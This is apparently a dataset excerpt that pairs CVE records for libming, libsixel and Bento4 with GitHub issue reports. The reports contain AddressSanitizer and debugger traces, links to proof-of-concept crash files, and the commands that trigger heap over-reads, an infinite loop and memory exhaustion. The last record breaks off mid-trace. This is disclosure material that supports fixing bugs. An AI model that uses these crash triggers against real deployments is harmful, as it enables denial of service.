cve_id
stringlengths 13
16
| cve_published
stringlengths 23
23
| cve_descriptions
stringlengths 48
2.08k
| cve_metrics
dict | cve_references
listlengths 1
138
| cve_configurations
listlengths 1
39
| url
stringlengths 37
77
| cve_tags
sequencelengths 1
4
⌀ | domain
stringclasses 1
value | issue_owner_repo
sequencelengths 2
2
| issue_body
stringlengths 0
88.6k
⌀ | issue_title
stringlengths 3
335
| issue_comments_url
stringlengths 56
81
| issue_comments_count
int64 0
146
| issue_created_at
stringlengths 20
20
| issue_updated_at
stringlengths 20
20
| issue_html_url
stringlengths 37
62
| issue_github_id
int64 104M
2.09B
| issue_number
int64 1
122k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2019-3572 | 2019-01-02T15:29:00.330 | An issue was discovered in libming 0.4.8. There is a heap-based buffer over-read in the function writePNG in the file util/dbl2png.c of the dbl2png command-line program. Because this is associated with an erroneous call to png_write_row in libpng, an out-of-bounds write might occur for some memory layouts. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/169"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/libming/libming/issues/169 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | I found a a heap-buffer-overflow problem in function writePNG in file ./util/dbl2png.c:234.
[poc.zip](https://github.com/libming/libming/files/2714649/poc.zip)
./debug/bin/dbl2png --verbose in2.dbl out.png
image data RGB
outsize=1605
size 65535 x 33023
unpacked data size t=1600 byte
channel count=3
Segmentation fault (core dumped)
```
==48243==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdd403ff404 at pc 0x7fdd44327733 bp 0x7ffd2f1f8fa0 sp 0x7ffd2f1f8748
READ of size 262140 at 0x7fdd403ff404 thread T0
#0 0x7fdd44327732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
#1 0x7fdd43e7fa17 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#2 0x7fdd43e7fa17 in png_write_row /home/fish/misc/libming/libpng-1.6.36/pngwrite.c:842
#3 0x557528274da6 in writePNG /home/fish/misc/libming/util/dbl2png.c:234
#4 0x5575282712d6 in main /home/fish/misc/libming/util/dbl2png.c:286
#5 0x7fdd43a8eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#6 0x557528271859 in _start (/home/fish/misc/libming/afl/bin/dbl2png+0x2859)
0x7fdd403ff404 is located 0 bytes to the right of 66714628-byte region [0x7fdd3c45f800,0x7fdd403ff404)
allocated by thread T0 here:
#0 0x7fdd4438cb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
#1 0x55752827295b in readDBL /home/fish/misc/libming/util/dbl2png.c:133
#2 0x200000007 (<unknown module>)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
Shadow bytes around the buggy address:
0x0ffc28077e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffc28077e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffc28077e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffc28077e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffc28077e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0ffc28077e80:[04]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ffc28077e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ffc28077ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ffc28077eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ffc28077ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ffc28077ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==48243==ABORTING
#0 __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:427
#1 0x00007ffff79a6a18 in memcpy (__len=<optimized out>, __src=<optimized out>, __dest=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#2 png_write_row (png_ptr=0x555555758490, row=<optimized out>) at pngwrite.c:842
#3 0x00005555555557e3 in writePNG (fp=0x555555758260, png=...) at dbl2png.c:234
#4 0x0000555555555a1a in main (argc=0x3, argv=0x7fffffffde68) at dbl2png.c:286
#5 0x00007ffff75b5b97 in __libc_start_main (main=0x5555555558a9 <main>, argc=0x3, argv=0x7fffffffde68, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffde58) at ../csu/libc-start.c:310
#6 0x0000555555554eca in _start ()
229 if(png.color_type == PNG_COLOR_TYPE_RGB)
230 {
231 png_set_filler(png_ptr, 0, PNG_FILLER_BEFORE);
232 for (i=0;i<png.height-1;i++)
233 {
// ptr=0x00007fffffffdce0 → [...] → 0x357a4fff2b6a42ff
→ 234 png_write_row(png_ptr,ptr);
235 ptr+=png.width * 4;
236 }
237 }
238 if(png.color_type == PNG_COLOR_TYPE_PALETTE)
239 {
gef➤ p ptr + png.width * 4 * 261
$3 = (byte *) 0x7ffff7395bfc ""
gef➤ p ptr + png.width * 4 * 262
$4 = (byte *) 0x7ffff73d5bf8 <error: Cannot access memory at address 0x7ffff73d5bf8>
```
| a heap-buffer-overflow problem in function writePNG in file ./util/dbl2png.c:234 | https://api.github.com/repos/libming/libming/issues/169/comments | 1 | 2018-12-28T10:35:44Z | 2019-01-07T16:23:12Z | https://github.com/libming/libming/issues/169 | 394,605,758 | 169 |
CVE-2019-3573 | 2019-01-02T15:29:00.360 | In libsixel v1.8.2, there is an infinite loop in the function sixel_decode_raw_impl() in the file fromsixel.c, as demonstrated by sixel2png. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/TeamSeri0us/pocs/tree/master/libsixel"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/saitoha/libsixel/issues/83"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.2:*:*:*:*:*:*:*",
"matchCriteriaId": "BAFCC979-2F4E-46A5-AC18-B6452E752D90",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/saitoha/libsixel/issues/83 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"saitoha",
"libsixel"
] | ./sixel2png [infinite_loop_poc1](https://github.com/TeamSeri0us/pocs/blob/master/libsixel/infinite_loop_poc1)
```
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:../../src/fromsixel.c+561 ]────
556 default:
557 if (*p >= '?' && *p <= '~') { /* sixel characters */
558 if (image->width < (context->pos_x + context->repeat_count) || image->height < (context->pos_y + 6)) {
559 sx = image->width * 2;
560 sy = image->height * 2;
// context=0x00007fffffffd6a0 → [...] → 0x0000000000000003, sx=0x0, sy=-0x80000000
→ 561 while (sx < (context->pos_x + context->repeat_count) || sy < (context->pos_y + 6)) {
562 sx *= 2;
563 sy *= 2;
564 }
565 status = image_buffer_resize(image, sx, sy, context->bgindex, allocator);
566 if (SIXEL_FAILED(status)) {
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "sixel2png", stopped, reason: SINGLE STEP
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0x7ffff7b7ed89 → Name: sixel_decode_raw_impl(p=0x555555774630 "^\033\\", len=0x53, image=0x7fffffffd7e0, context=0x7fffffffd760, allocator=0x555555774300)
[#1] 0x7ffff7b7f8b3 → Name: sixel_decode_raw(p=0x5555557745e0 "\033Pq\"1;1;70;11#1;2;", '1' <repeats 13 times>, "9;19;19#0!70~-!7", '1' <repeats 25 times>, "\"1111110^\033\\", len=0x53, pixels=0x7fffffffdc58, pwidth=0x7fffffffdc3c, pheight=0x7fffffffdc40, palette=0x7fffffffdc60, ncolors=0x7fffffffdc44, allocator=0x555555774300)
[#2] 0x7ffff7bacc8c → Name: sixel_decoder_decode(decoder=0x555555774330)
[#3] 0x555555554ea6 → Name: main(argc=0x2, argv=0x7fffffffde68)
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
561 while (sx < (context->pos_x + context->repeat_count) || sy < (context->pos_y + 6)) {
1: sx = 0x0
gef➤ p context->pos_x + context->repeat_count
$32 = 0x471c71c7
```
./img2sixel [heap-buffer-overflow-poc2](https://github.com/TeamSeri0us/pocs/blob/master/libsixel/heap-buffer-overflow-poc2)
```
Corrupt JPEG data: premature end of data segment
=================================================================
==100553==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc919e46f94 at pc 0x7fca3cf50228 bp 0x7fffe7f5e600 sp 0x7fffe7f5e5f8
READ of size 1 at 0x7fc919e46f94 thread T0
==100553==WARNING: failed to fork (errno 12)
==100553==WARNING: failed to fork (errno 12)
==100553==WARNING: failed to fork (errno 12)
==100553==WARNING: failed to fork (errno 12)
==100553==WARNING: failed to fork (errno 12)
==100553==WARNING: Failed to use and restart external symbolizer!
#0 0x7fca3cf50227 (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0x70227)
#1 0x7fca3cf4c758 (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0x6c758)
#2 0x7fca3cf53ae5 (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0x73ae5)
#3 0x7fca3cf36b25 (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0x56b25)
#4 0x7fca3d028e26 (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0x148e26)
#5 0x7fca3cf88581 (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0xa8581)
#6 0x7fca3d0264de (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0x1464de)
#7 0x50564a (/home/fish/Desktop/dumb/image/libsixel/fast/fast/bin/img2sixel+0x50564a)
#8 0x7fca3bf2fb96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#9 0x41c139 (/home/fish/Desktop/dumb/image/libsixel/fast/fast/bin/img2sixel+0x41c139)
0x7fc919e46f94 is located 0 bytes to the right of 433805204-byte region [0x7fc900091800,0x7fc919e46f94)
allocated by thread T0 here:
#0 0x4cb710 (/home/fish/Desktop/dumb/image/libsixel/fast/fast/bin/img2sixel+0x4cb710)
#1 0x7fca3d028ba1 (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0x148ba1)
#2 0x7fca3cf88581 (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0xa8581)
#3 0x7fca3d0264de (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0x1464de)
#4 0x50564a (/home/fish/Desktop/dumb/image/libsixel/fast/fast/bin/img2sixel+0x50564a)
#5 0x7fca3bf2fb96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fish/Desktop/dumb/image/libsixel/fast/fast/lib/libsixel.so.1+0x70227)
Shadow bytes around the buggy address:
0x0ff9a33c0da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff9a33c0db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff9a33c0dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff9a33c0dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff9a33c0de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0ff9a33c0df0: 00 00[04]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff9a33c0e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff9a33c0e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff9a33c0e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff9a33c0e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff9a33c0e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==100553==ABORTING
gef➤ bt
#0 __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:249
#1 0x00007ffff7ba4bae in load_jpeg (result=0x555555777428, data=0x7ffff7fd4010 "\377\330\377", <incomplete sequence \340>, datasize=0x1263b, pwidth=0x555555777438, pheight=0x55555577743c, ppixelformat=0x555555777444, allocator=0x555555777300) at ../../src/loader.c:198
#2 0x00007ffff7ba62d7 in load_with_builtin (pchunk=0x5555557773f0, fstatic=0x0, fuse_palette=0x1, reqcolors=0x100, bgcolor=0x0, loop_control=0x0, fn_load=0x7ffff7bac395 <load_image_callback>, context=0x555555777330) at ../../src/loader.c:820
#3 0x00007ffff7ba67d1 in sixel_helper_load_image_file (filename=0x7fffffffe247 "/home/fish/testcase/images/jpg/random.jpg", fstatic=0x0, fuse_palette=0x1, reqcolors=0x100, bgcolor=0x0, loop_control=0x0, fn_load=0x7ffff7bac395 <load_image_callback>, finsecure=0x0, cancel_flag=0x555555759014 <signaled>, context=0x555555777330, allocator=0x555555777300) at ../../src/loader.c:1352
#4 0x00007ffff7bac50e in sixel_encoder_encode (encoder=0x555555777330, filename=0x7fffffffe247 "/home/fish/testcase/images/jpg/random.jpg") at ../../src/encoder.c:1737
#5 0x0000555555555545 in main (argc=0x2, argv=0x7fffffffde78) at ../../converters/img2sixel.c:457
```
| two bugs in img2sixel and sixel2png | https://api.github.com/repos/saitoha/libsixel/issues/83/comments | 7 | 2019-01-02T08:08:21Z | 2019-12-14T21:01:47Z | https://github.com/saitoha/libsixel/issues/83 | 395,173,691 | 83 |
CVE-2018-20659 | 2019-01-02T17:29:00.220 | An issue was discovered in Bento4 1.5.1-627. The AP4_StcoAtom class in Core/Ap4StcoAtom.cpp has an attempted excessive memory allocation when called from AP4_AtomFactory::CreateAtomFromStream in Core/Ap4AtomFactory.cpp, as demonstrated by mp42hls. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/350"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*",
"matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/axiomatic-systems/Bento4/issues/350 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | A crafted input will lead to Memory allocation failed in Ap4StcoAtom.cpp at Bento4 1.5.1-627
Triggered by
./mp42hls crash7.mp4
Poc
[crash7.mp4.zip](https://github.com/axiomatic-systems/Bento4/files/2718552/crash7.mp4.zip)
Bento4 Version 1.5.1-627
The ASAN information is as follows:
```
==10432==ERROR: AddressSanitizer failed to allocate 0x100002000 (4294975488) bytes of LargeMmapAllocator (error code: 12)
==10432==Process memory map follows:
0x00007fff7000-0x00008fff7000
0x00008fff7000-0x02008fff7000
0x02008fff7000-0x10007fff8000
0x561a5fbfc000-0x561a602a2000 /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls
0x561a604a1000-0x561a604ab000 /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls
0x561a604ab000-0x561a6067f000 /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls
0x600000000000-0x602000000000
0x602000000000-0x602000010000
0x602000010000-0x602e00000000
0x602e00000000-0x602e00010000
0x602e00010000-0x603000000000
0x603000000000-0x603000010000
0x603000010000-0x603e00000000
0x603e00000000-0x603e00010000
0x603e00010000-0x604000000000
0x604000000000-0x604000010000
0x604000010000-0x604e00000000
0x604e00000000-0x604e00010000
0x604e00010000-0x606000000000
0x606000000000-0x606000010000
0x606000010000-0x606e00000000
0x606e00000000-0x606e00010000
0x606e00010000-0x607000000000
0x607000000000-0x607000010000
0x607000010000-0x607e00000000
0x607e00000000-0x607e00010000
0x607e00010000-0x608000000000
0x608000000000-0x608000010000
0x608000010000-0x608e00000000
0x608e00000000-0x608e00010000
0x608e00010000-0x60b000000000
0x60b000000000-0x60b000010000
0x60b000010000-0x60be00000000
0x60be00000000-0x60be00010000
0x60be00010000-0x60c000000000
0x60c000000000-0x60c000010000
0x60c000010000-0x60ce00000000
0x60ce00000000-0x60ce00010000
0x60ce00010000-0x60d000000000
0x60d000000000-0x60d000010000
0x60d000010000-0x60de00000000
0x60de00000000-0x60de00010000
0x60de00010000-0x60e000000000
0x60e000000000-0x60e000010000
0x60e000010000-0x60ee00000000
0x60ee00000000-0x60ee00010000
0x60ee00010000-0x611000000000
0x611000000000-0x611000010000
0x611000010000-0x611e00000000
0x611e00000000-0x611e00010000
0x611e00010000-0x615000000000
0x615000000000-0x615000010000
0x615000010000-0x615e00000000
0x615e00000000-0x615e00010000
0x615e00010000-0x616000000000
0x616000000000-0x616000010000
0x616000010000-0x616e00000000
0x616e00000000-0x616e00010000
0x616e00010000-0x619000000000
0x619000000000-0x619000010000
0x619000010000-0x619e00000000
0x619e00000000-0x619e00010000
0x619e00010000-0x621000000000
0x621000000000-0x621000010000
0x621000010000-0x621e00000000
0x621e00000000-0x621e00010000
0x621e00010000-0x624000000000
0x624000000000-0x624000010000
0x624000010000-0x624e00000000
0x624e00000000-0x624e00010000
0x624e00010000-0x631000000000
0x631000000000-0x631000020000
0x631000020000-0x631e00000000
0x631e00000000-0x631e00010000
0x631e00010000-0x640000000000
0x640000000000-0x640000003000
0x7f8b99e00000-0x7f8b99f00000
0x7f8b9a000000-0x7f8b9a100000
0x7f8b9a200000-0x7f8b9a300000
0x7f8b9a400000-0x7f8b9a500000
0x7f8b9a600000-0x7f8b9a700000
0x7f8b9a770000-0x7f8b9cac2000
0x7f8b9cac2000-0x7f8b9cc5f000 /lib/x86_64-linux-gnu/libm-2.27.so
0x7f8b9cc5f000-0x7f8b9ce5e000 /lib/x86_64-linux-gnu/libm-2.27.so
0x7f8b9ce5e000-0x7f8b9ce5f000 /lib/x86_64-linux-gnu/libm-2.27.so
0x7f8b9ce5f000-0x7f8b9ce60000 /lib/x86_64-linux-gnu/libm-2.27.so
0x7f8b9ce60000-0x7f8b9ce7a000 /lib/x86_64-linux-gnu/libpthread-2.27.so
0x7f8b9ce7a000-0x7f8b9d079000 /lib/x86_64-linux-gnu/libpthread-2.27.so
0x7f8b9d079000-0x7f8b9d07a000 /lib/x86_64-linux-gnu/libpthread-2.27.so
0x7f8b9d07a000-0x7f8b9d07b000 /lib/x86_64-linux-gnu/libpthread-2.27.so
0x7f8b9d07b000-0x7f8b9d07f000
0x7f8b9d07f000-0x7f8b9d086000 /lib/x86_64-linux-gnu/librt-2.27.so
0x7f8b9d086000-0x7f8b9d285000 /lib/x86_64-linux-gnu/librt-2.27.so
0x7f8b9d285000-0x7f8b9d286000 /lib/x86_64-linux-gnu/librt-2.27.so
0x7f8b9d286000-0x7f8b9d287000 /lib/x86_64-linux-gnu/librt-2.27.so
0x7f8b9d287000-0x7f8b9d28a000 /lib/x86_64-linux-gnu/libdl-2.27.so
0x7f8b9d28a000-0x7f8b9d489000 /lib/x86_64-linux-gnu/libdl-2.27.so
0x7f8b9d489000-0x7f8b9d48a000 /lib/x86_64-linux-gnu/libdl-2.27.so
0x7f8b9d48a000-0x7f8b9d48b000 /lib/x86_64-linux-gnu/libdl-2.27.so
0x7f8b9d48b000-0x7f8b9d672000 /lib/x86_64-linux-gnu/libc-2.27.so
0x7f8b9d672000-0x7f8b9d872000 /lib/x86_64-linux-gnu/libc-2.27.so
0x7f8b9d872000-0x7f8b9d876000 /lib/x86_64-linux-gnu/libc-2.27.so
0x7f8b9d876000-0x7f8b9d878000 /lib/x86_64-linux-gnu/libc-2.27.so
0x7f8b9d878000-0x7f8b9d87c000
0x7f8b9d87c000-0x7f8b9d893000 /lib/x86_64-linux-gnu/libgcc_s.so.1
0x7f8b9d893000-0x7f8b9da92000 /lib/x86_64-linux-gnu/libgcc_s.so.1
0x7f8b9da92000-0x7f8b9da93000 /lib/x86_64-linux-gnu/libgcc_s.so.1
0x7f8b9da93000-0x7f8b9da94000 /lib/x86_64-linux-gnu/libgcc_s.so.1
0x7f8b9da94000-0x7f8b9dc0d000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
0x7f8b9dc0d000-0x7f8b9de0d000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
0x7f8b9de0d000-0x7f8b9de17000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
0x7f8b9de17000-0x7f8b9de19000 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
0x7f8b9de19000-0x7f8b9de1d000
0x7f8b9de1d000-0x7f8b9df6d000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0
0x7f8b9df6d000-0x7f8b9e16d000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0
0x7f8b9e16d000-0x7f8b9e170000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0
0x7f8b9e170000-0x7f8b9e173000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0
0x7f8b9e173000-0x7f8b9edd8000
0x7f8b9edd8000-0x7f8b9edff000 /lib/x86_64-linux-gnu/ld-2.27.so
0x7f8b9ee9f000-0x7f8b9efea000
0x7f8b9efea000-0x7f8b9efff000
0x7f8b9efff000-0x7f8b9f000000 /lib/x86_64-linux-gnu/ld-2.27.so
0x7f8b9f000000-0x7f8b9f001000 /lib/x86_64-linux-gnu/ld-2.27.so
0x7f8b9f001000-0x7f8b9f002000
0x7ffce3bd8000-0x7ffce3bf9000 [stack]
0x7ffce3bfb000-0x7ffce3bfe000 [vvar]
0x7ffce3bfe000-0x7ffce3c00000 [vdso]
0xffffffffff600000-0xffffffffff601000 [vsyscall]
==10432==End of process memory map.
==10432==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0)
#0 0x7f8b9df06c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02)
#1 0x7f8b9df25595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595)
#2 0x7f8b9df10492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492)
#3 0x7f8b9df1c8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5)
#4 0x7f8b9de46a51 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x29a51)
#5 0x7f8b9defd5de in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe05de)
#6 0x561a5ffcf4c4 in AP4_StcoAtom::AP4_StcoAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4StcoAtom.cpp:81
#7 0x561a5ffcf104 in AP4_StcoAtom::Create(unsigned int, AP4_ByteStream&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4StcoAtom.cpp:52
#8 0x561a5ff41d64 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:434
#9 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221
